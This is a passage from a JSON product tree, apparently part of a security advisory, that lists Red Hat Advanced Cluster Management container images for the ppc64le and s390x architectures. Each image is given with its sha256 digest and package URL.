"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3Ac0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3Ab4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3Af87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3A2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3Aabe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3Ae41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3A94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3Ab646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3A5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3A241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3A844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3Aea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3A8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3A719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3A911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3Abf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3Acfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3A0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3A607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3A47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3A505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3Ae780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3A2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3A5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3Af014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3Ac069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3Ad8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3A492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3Ae1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3A3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3A9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3A2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3Abd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3A182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3Aabccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3Ad9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"product_identification_helper": {
